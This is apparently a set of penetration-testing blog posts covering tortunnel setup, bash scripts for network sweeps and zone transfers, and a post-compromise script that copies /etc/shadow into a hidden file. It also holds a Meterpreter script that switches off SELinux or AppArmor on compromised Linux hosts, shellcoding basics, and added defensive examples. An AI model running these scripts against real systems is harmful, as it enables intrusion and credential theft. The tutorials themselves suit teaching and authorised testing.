Tortunnel on Backtrack 5r1 64bit

I ran into an issue installing tortunnel on my laptop yesterday. Tortunnel allows you to utilize the Tor network for things like scanning during a pentest. I am running a fresh install of bt5r1 64bit. You first need tor and privoxy installed; follow these instructions in order to get both installed. Initially, running ./configure inside the untarred tortunnel folder works. Running make, however, causes errors complaining about ssl and boost. With a little digging I figured it out. The first thing missing is libssl-dev. This can be fixed by running:

apt-get install libssl-dev

make now gets a little further but errors out once again, this time complaining about missing boost files. To fix those errors, install the boost development packages:

apt-get install libboost-dev 

and then

apt-get install libboost-system*

Now rerun the command

make && make install

Basic bash scripting for penetration testers

When it comes to pen testing using a linux distro, bash scripting can really help you out by speeding things up. You can quickly and easily create scripts on the fly to aid your assessment.

Example 1:

So let's say I want to do a quick ping sweep using nmap. I am going to use the -oG switch to write grepable output to a file.

nmap -sP 10.10.101.0/24 -oG ipaddr.txt

Let's display the contents of ipaddr.txt.

cat ipaddr.txt 
# Nmap 5.51 scan initiated Sat Jul 30 16:07:02 2011 as: nmap -v -sP -oG ipaddr.txt 10.10.101.0/24
# Ports scanned: TCP(0;) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.101.0 ()	Status: Down
Host: 10.10.101.1 ()	Status: Down
Host: 10.10.101.2 ()	Status: Down
Host: 10.10.101.3 ()	Status: Down
Host: 10.10.101.4 ()	Status: Down
Host: 10.10.101.5 ()	Status: Down
Host: 10.10.101.6 ()	Status: Down
Host: 10.10.101.7 ()	Status: Down
Host: 10.10.101.8 ()	Status: Down
Host: 10.10.101.9 ()	Status: Down
Host: 10.10.101.10 ()	Status: Down
Host: 10.10.101.11 ()	Status: Up
Host: 10.10.101.12 ()	Status: Down
Host: 10.10.101.13 ()	Status: Up
Host: 10.10.101.14 ()	Status: Down
Host: 10.10.101.15 ()	Status: Down
Host: 10.10.101.16 ()	Status: Down
Host: 10.10.101.17 ()	Status: Down
Host: 10.10.101.18 ()	Status: Down
Host: 10.10.101.19 ()	Status: Down
Host: 10.10.101.20 ()	Status: Down
Host: 10.10.101.21 ()	Status: Down
Host: 10.10.101.22 ()	Status: Down
Host: 10.10.101.23 ()	Status: Down
Host: 10.10.101.24 ()	Status: Down
Host: 10.10.101.25 ()	Status: Down
Host: 10.10.101.26 ()	Status: Down
Host: 10.10.101.27 ()	Status: Down
Host: 10.10.101.28 ()	Status: Down
Host: 10.10.101.29 ()	Status: Down
Host: 10.10.101.30 ()	Status: Down
Host: 10.10.101.31 ()	Status: Down
Host: 10.10.101.32 ()	Status: Down
Host: 10.10.101.33 ()	Status: Down
Host: 10.10.101.34 ()	Status: Down
Host: 10.10.101.35 ()	Status: Down
Host: 10.10.101.36 ()	Status: Down
Host: 10.10.101.37 ()	Status: Down
Host: 10.10.101.38 ()	Status: Down
Host: 10.10.101.39 ()	Status: Down
Host: 10.10.101.40 ()	Status: Down
Host: 10.10.101.41 ()	Status: Down
Host: 10.10.101.42 ()	Status: Down
Host: 10.10.101.43 ()	Status: Down
Host: 10.10.101.44 ()	Status: Down
Host: 10.10.101.45 ()	Status: Down
Host: 10.10.101.46 ()	Status: Down
Host: 10.10.101.47 ()	Status: Down
Host: 10.10.101.48 ()	Status: Down
Host: 10.10.101.49 ()	Status: Down
Host: 10.10.101.50 ()	Status: Down
Host: 10.10.101.51 ()	Status: Down
Host: 10.10.101.52 ()	Status: Down
Host: 10.10.101.53 ()	Status: Down
Host: 10.10.101.54 ()	Status: Down
Host: 10.10.101.55 ()	Status: Down
Host: 10.10.101.56 ()	Status: Down
Host: 10.10.101.57 ()	Status: Down
Host: 10.10.101.58 ()	Status: Down
Host: 10.10.101.59 ()	Status: Down
Host: 10.10.101.60 ()	Status: Up
Host: 10.10.101.61 ()	Status: Down
Host: 10.10.101.62 ()	Status: Down
Host: 10.10.101.63 ()	Status: Down
Host: 10.10.101.64 ()	Status: Down
Host: 10.10.101.65 ()	Status: Down
Host: 10.10.101.66 ()	Status: Down
Host: 10.10.101.67 ()	Status: Down
Host: 10.10.101.68 ()	Status: Down
Host: 10.10.101.69 ()	Status: Down
Host: 10.10.101.70 ()	Status: Down
Host: 10.10.101.71 ()	Status: Down
Host: 10.10.101.72 ()	Status: Down
Host: 10.10.101.73 ()	Status: Down
Host: 10.10.101.74 ()	Status: Down
Host: 10.10.101.75 ()	Status: Down
Host: 10.10.101.76 ()	Status: Down
Host: 10.10.101.77 ()	Status: Down
Host: 10.10.101.78 ()	Status: Down
Host: 10.10.101.79 ()	Status: Down
Host: 10.10.101.80 ()	Status: Down
Host: 10.10.101.81 ()	Status: Down
Host: 10.10.101.82 ()	Status: Down
Host: 10.10.101.83 ()	Status: Down
Host: 10.10.101.84 ()	Status: Down
Host: 10.10.101.85 ()	Status: Down
Host: 10.10.101.86 ()	Status: Down
Host: 10.10.101.87 ()	Status: Down
Host: 10.10.101.88 ()	Status: Down
Host: 10.10.101.89 ()	Status: Down
Host: 10.10.101.90 ()	Status: Down
Host: 10.10.101.91 ()	Status: Down
Host: 10.10.101.92 ()	Status: Down
Host: 10.10.101.93 ()	Status: Down
Host: 10.10.101.94 ()	Status: Down
Host: 10.10.101.95 ()	Status: Down
Host: 10.10.101.96 ()	Status: Down
Host: 10.10.101.97 ()	Status: Down
Host: 10.10.101.98 ()	Status: Down
Host: 10.10.101.99 ()	Status: Down
Host: 10.10.101.100 ()	Status: Down
Host: 10.10.101.101 ()	Status: Up
Host: 10.10.101.102 ()	Status: Down
Host: 10.10.101.103 ()	Status: Down
Host: 10.10.101.104 ()	Status: Down
Host: 10.10.101.105 ()	Status: Down
Host: 10.10.101.106 ()	Status: Down
Host: 10.10.101.107 ()	Status: Down
Host: 10.10.101.108 ()	Status: Down
Host: 10.10.101.109 ()	Status: Down
Host: 10.10.101.110 ()	Status: Down
Host: 10.10.101.111 ()	Status: Down
Host: 10.10.101.112 ()	Status: Down
Host: 10.10.101.113 ()	Status: Down
Host: 10.10.101.114 ()	Status: Down
Host: 10.10.101.115 ()	Status: Down
Host: 10.10.101.116 ()	Status: Down
Host: 10.10.101.117 ()	Status: Down
Host: 10.10.101.118 ()	Status: Down
Host: 10.10.101.119 ()	Status: Down
Host: 10.10.101.120 ()	Status: Down
Host: 10.10.101.121 ()	Status: Down
Host: 10.10.101.122 ()	Status: Down
Host: 10.10.101.123 ()	Status: Down
Host: 10.10.101.124 ()	Status: Down
Host: 10.10.101.125 ()	Status: Down
Host: 10.10.101.126 ()	Status: Down
Host: 10.10.101.127 ()	Status: Down
Host: 10.10.101.128 ()	Status: Down
Host: 10.10.101.129 ()	Status: Down
Host: 10.10.101.130 ()	Status: Down
Host: 10.10.101.131 ()	Status: Down
Host: 10.10.101.132 ()	Status: Down
Host: 10.10.101.133 ()	Status: Down
Host: 10.10.101.134 ()	Status: Down
Host: 10.10.101.135 ()	Status: Down
Host: 10.10.101.136 ()	Status: Down
Host: 10.10.101.137 ()	Status: Down
Host: 10.10.101.138 ()	Status: Down
Host: 10.10.101.139 ()	Status: Down
Host: 10.10.101.140 ()	Status: Down
Host: 10.10.101.141 ()	Status: Down
Host: 10.10.101.142 ()	Status: Down
Host: 10.10.101.143 ()	Status: Down
Host: 10.10.101.144 ()	Status: Down
Host: 10.10.101.145 ()	Status: Down
Host: 10.10.101.146 ()	Status: Down
Host: 10.10.101.147 ()	Status: Down
Host: 10.10.101.148 ()	Status: Down
Host: 10.10.101.149 ()	Status: Down
Host: 10.10.101.150 ()	Status: Down
Host: 10.10.101.151 ()	Status: Down
Host: 10.10.101.152 ()	Status: Down
Host: 10.10.101.153 ()	Status: Down
Host: 10.10.101.154 ()	Status: Down
Host: 10.10.101.155 ()	Status: Down
Host: 10.10.101.156 ()	Status: Down
Host: 10.10.101.157 ()	Status: Down
Host: 10.10.101.158 ()	Status: Down
Host: 10.10.101.159 ()	Status: Down
Host: 10.10.101.160 ()	Status: Down
Host: 10.10.101.161 ()	Status: Down
Host: 10.10.101.162 ()	Status: Down
Host: 10.10.101.163 ()	Status: Down
Host: 10.10.101.164 ()	Status: Down
Host: 10.10.101.165 ()	Status: Down
Host: 10.10.101.166 ()	Status: Down
Host: 10.10.101.167 ()	Status: Down
Host: 10.10.101.168 ()	Status: Down
Host: 10.10.101.169 ()	Status: Down
Host: 10.10.101.170 ()	Status: Down
Host: 10.10.101.171 ()	Status: Down
Host: 10.10.101.172 ()	Status: Down
Host: 10.10.101.173 ()	Status: Down
Host: 10.10.101.174 ()	Status: Down
Host: 10.10.101.175 ()	Status: Down
Host: 10.10.101.176 ()	Status: Down
Host: 10.10.101.177 ()	Status: Down
Host: 10.10.101.178 ()	Status: Down
Host: 10.10.101.179 ()	Status: Down
Host: 10.10.101.180 ()	Status: Down
Host: 10.10.101.181 ()	Status: Down
Host: 10.10.101.182 ()	Status: Down
Host: 10.10.101.183 ()	Status: Down
Host: 10.10.101.184 ()	Status: Down
Host: 10.10.101.185 ()	Status: Down
Host: 10.10.101.186 ()	Status: Down
Host: 10.10.101.187 ()	Status: Down
Host: 10.10.101.188 ()	Status: Down
Host: 10.10.101.189 ()	Status: Down
Host: 10.10.101.190 ()	Status: Down
Host: 10.10.101.191 ()	Status: Down
Host: 10.10.101.192 ()	Status: Down
Host: 10.10.101.193 ()	Status: Down
Host: 10.10.101.194 ()	Status: Down
Host: 10.10.101.195 ()	Status: Down
Host: 10.10.101.196 ()	Status: Down
Host: 10.10.101.197 ()	Status: Down
Host: 10.10.101.198 ()	Status: Down
Host: 10.10.101.199 ()	Status: Down
Host: 10.10.101.200 ()	Status: Down
Host: 10.10.101.201 ()	Status: Down
Host: 10.10.101.202 ()	Status: Down
Host: 10.10.101.203 ()	Status: Down
Host: 10.10.101.204 ()	Status: Down
Host: 10.10.101.205 ()	Status: Down
Host: 10.10.101.206 ()	Status: Down
Host: 10.10.101.207 ()	Status: Down
Host: 10.10.101.208 ()	Status: Down
Host: 10.10.101.209 ()	Status: Down
Host: 10.10.101.210 ()	Status: Down
Host: 10.10.101.211 ()	Status: Down
Host: 10.10.101.212 ()	Status: Down
Host: 10.10.101.213 ()	Status: Down
Host: 10.10.101.214 ()	Status: Down
Host: 10.10.101.215 ()	Status: Down
Host: 10.10.101.216 ()	Status: Down
Host: 10.10.101.217 ()	Status: Down
Host: 10.10.101.218 ()	Status: Down
Host: 10.10.101.219 ()	Status: Down
Host: 10.10.101.220 ()	Status: Down
Host: 10.10.101.221 ()	Status: Down
Host: 10.10.101.222 ()	Status: Down
Host: 10.10.101.223 ()	Status: Down
Host: 10.10.101.224 ()	Status: Down
Host: 10.10.101.225 ()	Status: Down
Host: 10.10.101.226 ()	Status: Down
Host: 10.10.101.227 ()	Status: Down
Host: 10.10.101.228 ()	Status: Down
Host: 10.10.101.229 ()	Status: Down
Host: 10.10.101.230 ()	Status: Down
Host: 10.10.101.231 ()	Status: Down
Host: 10.10.101.232 ()	Status: Down
Host: 10.10.101.233 ()	Status: Down
Host: 10.10.101.234 ()	Status: Down
Host: 10.10.101.235 ()	Status: Down
Host: 10.10.101.236 ()	Status: Down
Host: 10.10.101.237 ()	Status: Down
Host: 10.10.101.238 ()	Status: Down
Host: 10.10.101.239 ()	Status: Down
Host: 10.10.101.240 ()	Status: Down
Host: 10.10.101.241 ()	Status: Down
Host: 10.10.101.242 ()	Status: Down
Host: 10.10.101.243 ()	Status: Down
Host: 10.10.101.244 ()	Status: Down
Host: 10.10.101.245 ()	Status: Down
Host: 10.10.101.246 ()	Status: Down
Host: 10.10.101.247 ()	Status: Down
Host: 10.10.101.248 ()	Status: Down
Host: 10.10.101.249 ()	Status: Down
Host: 10.10.101.250 ()	Status: Down
Host: 10.10.101.251 ()	Status: Down
Host: 10.10.101.252 ()	Status: Down
Host: 10.10.101.253 ()	Status: Down
Host: 10.10.101.254 ()	Status: Down
Host: 10.10.101.255 ()	Status: Down
# Nmap done at Sat Jul 30 16:07:05 2011 -- 256 IP addresses (4 hosts up) scanned in 3.16 seconds

We are only concerned with the hosts that are alive, so how do we quickly get a listing of just the hosts that are up?
Like this:

cat ipaddr.txt | grep Up | cut -d" " -f2
10.10.101.11
10.10.101.13
10.10.101.60
10.10.101.101

This pipeline cats the contents of ipaddr.txt, uses grep to show only the lines containing the keyword Up, then uses cut with a space as the delimiter to display field 2 only. The result is a clean listing of IP addresses.
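The same extraction done with awk, as an added example that is not part of the original post: it keys on the Status field itself rather than on any line containing "Up", and prints each address once, so a port line for the same host (or a hostname that happens to contain "Up") does not produce duplicates. The sample file it writes is constructed in the same layout nmap uses.

```shell
#!/bin/sh
# List the Up hosts from an nmap -oG file. Added example, not from the post.
# nmap separates the fields of a grepable line with tabs, so matching on the
# "\tStatus: Up" field and de-duplicating on $2 (the address) is enough.

up_hosts() {
    # $1: path to an nmap -oG file. Prints each Up address once, in file order.
    awk '/^Host:/ && /\tStatus: Up/ { if (!seen[$2]++) print $2 }' "$1"
}

count_up_hosts() {
    # $1: path to an nmap -oG file. Prints the number of distinct Up hosts.
    up_hosts "$1" | wc -l | tr -d ' '
}

write_sample_grepable() {
    # $1: output path. Constructed sample; .13 also has a Ports line and a
    # hostname containing "Up", the two cases grep Up | cut gets wrong.
    {
        printf '# Nmap 5.51 scan initiated Sat Jul 30 16:07:02 2011 as: nmap -sP -oG %s 10.10.101.0/24\n' "$1"
        printf 'Host: 10.10.101.10 ()\tStatus: Down\n'
        printf 'Host: 10.10.101.11 ()\tStatus: Up\n'
        printf 'Host: 10.10.101.13 (Uploads-srv)\tStatus: Up\n'
        printf 'Host: 10.10.101.13 (Uploads-srv)\tPorts: 80/open/tcp//http///\n'
        printf 'Host: 10.10.101.60 ()\tStatus: Up\n'
        printf '# Nmap done at Sat Jul 30 16:07:05 2011 -- 256 IP addresses (3 hosts up) scanned in 3.16 seconds\n'
    } > "$1"
}

# Usage: ./up_hosts.sh ipaddr.txt
if [ $# -gt 0 ]; then
    up_hosts "$1"
fi
```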

Example 2:

So let's say you have a listing of domains you want to attempt zone transfers on. You don't want to slowly try each one individually; most pentests are limited in time, so you want to get as much as possible done in a short period.
So let's whip up a script that does this based on your list of domains.
The domain list is a text file in this format:

gooble.com
testcompany.net
fakecompany.org

Save this file as domains.txt and get scripting on a tool that attempts a zone transfer against each domain in the list.

#!/bin/bash
# Request a zone transfer (AXFR) from the name servers of each domain listed in domains.txt
for i in $(cat domains.txt)
do
  host -l "$i"
done

Save the script as zonetransfer.sh and run:

chmod +x zonetransfer.sh

This will make the file executable. Also make sure domains.txt is in the same folder as the script.

Example 3:

So let's say you have a bunch of failed zone transfers because the company you are doing a pentest for blocks zone transfers from anyone but their own DNS servers. If you happen to have a particular subnet in scope, you can attempt reverse lookups of each IP to gather DNS PTR records. Doing each IP individually would take a decent amount of time, so let's have bash do the work for us.

#!/bin/bash
# Reverse lookup (PTR record) of every address in a /24.
# Note: host <ip> asks for the PTR record; host -l would request a zone transfer instead.
i=1

echo "Please enter first 3 octets. e.g. 192.168.1"
read subnet
while [ "$i" -le 254 ]; do
  host "$subnet.$i"
  i=$(( i + 1 ))
done

This bash script iterates through hosts 1 to 254 of the subnet, doing a reverse lookup of each IP address.
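Example 3 as a function with the two things a practitioner would add before running it against a real range; added example, not the post's script. The three octets are validated before a single query is sent (a bare read of user input is otherwise passed straight to a command), host is given a per-query timeout (the real -W option), and only addresses that actually answer with a PTR record are printed. It assumes host is on the PATH.

```shell
#!/bin/sh
# PTR sweep of a /24 with input validation. Added example, not from the post.

valid_prefix() {
    # $1: "a.b.c". Returns 0 only if it is exactly three octets, each 0-255.
    case "$1" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;   # anything but digits and dots, or an empty octet
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ $# -eq 3 ] || return 1
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

ptr_sweep() {
    # $1: first three octets. Prints "ip name" for every host that has a PTR record.
    valid_prefix "$1" || { echo "bad prefix: $1" >&2; return 2; }
    i=1
    while [ "$i" -le 254 ]; do
        # host prints "... domain name pointer NAME." on success and a
        # "not found" line (non-zero exit) otherwise; keep only the name.
        name=$(host -W 2 "$1.$i" 2>/dev/null | awk '/domain name pointer/ { print $NF; exit }')
        [ -n "$name" ] && printf '%s %s\n' "$1.$i" "$name"
        i=$((i + 1))
    done
    return 0
}

# Usage: ./ptr_sweep.sh 10.10.101
if [ $# -gt 0 ]; then
    ptr_sweep "$1"
fi
```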

Example 4:

In this example we assume you have root access to a compromised Linux server. You want to gather information from the server to place in your pentest report and to assist in possibly compromising additional servers.

#!/bin/bash
# Every section below is appended to .gathered_info, a hidden file in the current directory

echo "#############################" >> .gathered_info
echo "#Linux info gather script" >> .gathered_info
echo "#############################" >> .gathered_info
echo " " >> .gathered_info
echo "[+]Running whoami..."
echo "*********WHOAMI**************" >> .gathered_info
whoami >> .gathered_info
echo "[+]Gathering hosts..."
echo "*********HOSTS FILE**********" >> .gathered_info
echo " " >> .gathered_info
cat /etc/hosts >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering network info..." 
echo "*********IFCONFIG************" >> .gathered_info
echo " " >> .gathered_info
/sbin/ifconfig >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering arp info..."
echo "*********ARP****************" >> .gathered_info
echo " " >> .gathered_info
/usr/sbin/arp -a >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering IPtables..."
echo "********IPtables************" >> .gathered_info
echo " " >> .gathered_info
/sbin/iptables -L >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering Route info..."
echo "********Route info**********" >> .gathered_info
echo " " >> .gathered_info
/sbin/route >> .gathered_info
echo " " >> .gathered_info
echo "[+]Gathering Shadow file..."
echo "********Shadow file*********" >> .gathered_info
echo " " >> .gathered_info
/bin/cat /etc/shadow >> .gathered_info
echo " " >> .gathered_info
echo "****************************" >> .gathered_info

The end result is all gathered info placed neatly in a hidden text file. It certainly beats running each command manually to gather information.

I hope these examples show you the power and flexibility of bash whether used in penetration testing or even everyday system administration.

Quick Meterpreter script

Since I wanted to get back into Ruby and I also like Metasploit, I decided to write a quick Meterpreter script to assist in shutting down the mandatory access control running on your flavor of Linux. It's real quick and dirty, but it gets the job done.

#$Id: mac_off.rb 2011-06-19 3vi1john$
#Meterpreter script for Linux that switches SELinux to permissive mode or turns off AppArmor.
#$Revision: 1$
#Provided by John Babio at <3vi1john [at] gmx.com>

@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)

def usage
  print_line("This script quickly sets selinux to permissive mode or turns off apparmor depending on the compromised linux distro")
  print_line("USAGE: Just run the script.")
  print_line(@@exec_opts.usage)
  raise Rex::Script::Completed
end

@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    usage
  end
}

# sysinfo['OS'] is the uname-style string, whose kernel release usually carries the distro tag (el5, fc14, Ubuntu, ...)
kernel = client.sys.config.sysinfo['OS']
print_status("Checking Linux version...")
if kernel =~ /el3|el4|el5|el6|fc1|fc2|fc3|fc4|fc5|fc6|fc7|fc8|fc9|fc10|fc11|fc12|fc13|fc14|fc15/
  print_status("It looks like a version of Redhat or Fedora.")
  print_status("Attempting to move SELinux from enforcing to permissive...")
  # execute does not wait for the command or report its exit status, so the success message is optimistic
  client.sys.process.execute("/usr/sbin/setenforce", "permissive")
  print_status("Successfully moved SELinux to permissive mode.")
elsif kernel =~ /Ubuntu|ubuntu|Suse|suse|sles|Sles/
  print_status("It looks like Ubuntu or Suse.")
  print_status("Attempting to kill AppArmor...")
  client.sys.process.execute("/etc/init.d/apparmor", "teardown")
  print_status("Successfully turned off apparmor.")
else
  print_status("The linux version is not found in the list. No MAC to kill.")
end
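The other side of that script, as an added example that is not part of the original post: both changes it makes are logged by the kernel, an SELinux mode change as an audit MAC_STATUS record (enforcing=0 old_enforcing=1) and an AppArmor profile unload as an apparmor="STATUS" operation="profile_remove" message, so a defender can flag them from the audit log or syslog. The sample lines below are constructed in the shape of those records; the timestamps, pids and profile names are not from a real host.

```shell
#!/bin/sh
# Flag MAC being switched off in audit/syslog lines. Added example, not from the post.

mac_change_alerts() {
    # Reads log lines on stdin; prints one ALERT line per matching record.
    # " enforcing=0 " is anchored on the leading space so that old_enforcing=0
    # (the record written when enforcing is turned back ON) does not match.
    awk '
        /type=MAC_STATUS/ && / enforcing=0 / && / old_enforcing=1/ {
            print "ALERT selinux switched to permissive: " $0; next
        }
        /apparmor="STATUS"/ && /operation="profile_remove"/ {
            print "ALERT apparmor profile unloaded: " $0; next
        }'
}

count_mac_alerts() {
    # Reads log lines on stdin; prints the number of alerts they produce.
    mac_change_alerts | grep -c '^ALERT'
}

sample_log_lines() {
    # Constructed sample: one SELinux off, one SELinux back on, one unrelated
    # syscall record, one AppArmor profile removal, one profile load.
    cat <<'EOF'
type=MAC_STATUS msg=audit(1308500000.123:456): enforcing=0 old_enforcing=1 auid=0 ses=1
type=MAC_STATUS msg=audit(1308500100.456:457): enforcing=1 old_enforcing=0 auid=0 ses=1
type=SYSCALL msg=audit(1308500000.124:458): arch=40000003 syscall=4 success=yes exit=1
kernel: [  123.456] type=1400 audit(1308500200.789:12): apparmor="STATUS" operation="profile_remove" profile="unconfined" name="/usr/sbin/ntpd" pid=2101 comm="apparmor_parser"
kernel: [  123.457] type=1400 audit(1308500200.790:13): apparmor="STATUS" operation="profile_load" name="/usr/sbin/ntpd" pid=2102 comm="apparmor_parser"
EOF
}

# Usage: ./mac_alerts.sh < /var/log/audit/audit.log   (or with no input: run the sample)
if [ -t 0 ]; then
    sample_log_lines | mac_change_alerts
else
    mac_change_alerts
fi
```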

Shellcoding on Linux

Shellcoding on Linux is easier to get started with than shellcoding on Windows. There are a few things to know before getting started.

1. What's the purpose of the shellcode? Shellcode is usually a small program performing a simple task, e.g. adding an administrative user to a compromised system.

2. The syscall number or numbers you need to use. The number is placed in eax (see the syscall number list).

3. Which other registers are required? e.g. for a simple exit shellcode, ebx must hold the exit status 0 and eax must hold syscall number 1.

4. Style of assembly syntax: AT&T or Intel. AT&T order is instruction source, destination; Intel order is instruction destination, source.

5. Tools: nasm, ld, and objdump. e.g. assembling the file shellcode.asm with nasm would be “nasm -f elf shellcode.asm”.

Linking the shellcode.o file created by nasm would be “ld shellcode.o -o shellcode”.

Dumping the opcodes for use in your shellcode would be “objdump -d shellcode”. The middle column of opcodes is concatenated in “\xNN” form, one \x per byte.

6. Eliminate null bytes from your opcodes. A null byte shows up as 00 in the dump and, since it is the C string terminator, prematurely terminates the shellcode when it is copied as a string. e.g. (Intel syntax) instead of mov eax,1 use mov al,1 (the 8-bit part of eax), or push byte 1 and pop eax. Instead of mov ebx,0 use xor ebx,ebx.